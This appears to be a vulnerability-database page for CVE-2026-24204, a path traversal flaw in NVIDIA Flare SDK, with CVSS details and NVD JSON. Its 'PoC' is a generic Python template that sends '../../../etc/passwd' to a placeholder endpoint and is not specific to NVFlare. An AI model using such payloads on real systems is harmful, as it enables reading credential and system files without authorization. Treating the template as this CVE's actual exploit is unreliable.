Security Vulnerability Report
中文
CVE-2026-24204 CVSS 6.5 MEDIUM

CVE-2026-24204

Published: 2026-04-28 19:36:45
Last Modified: 2026-05-04 14:33:23

Description

NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Improper Input Validation by path traversing. A successful exploit of this vulnerability may lead to information disclosure.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nvidia:nvflare:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA Flare SDK (具体受影响版本请参考NVIDIA官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL example (replace with actual vulnerable endpoint) target_url = "http://target-host:port/api/vulnerable_endpoint" # Malicious payload using path traversal to access /etc/passwd # Attackers may modify the payload to target other sensitive files payload = { "file_path": "../../../etc/passwd" } try: # Sending the malicious request response = requests.post(target_url, data=payload) # Checking if the exploit was successful by looking for root user in response if response.status_code == 200 and "root:" in response.text: print("[+] Vulnerability exploited successfully!") print("[+] Sensitive data retrieved:") print(response.text) else: print("[-] Exploit failed or target is not vulnerable.") print("Status Code:", response.status_code) except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24204", "sourceIdentifier": "[email protected]", "published": "2026-04-28T19:36:45.397", "lastModified": "2026-05-04T14:33:23.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Improper Input Validation by path traversing. A successful exploit of this vulnerability may lead to information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvflare:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.2", "matchCriteriaId": "64789867-7386-4DE6-A464-0FA8F7E256FE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24204", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5819", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24204", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}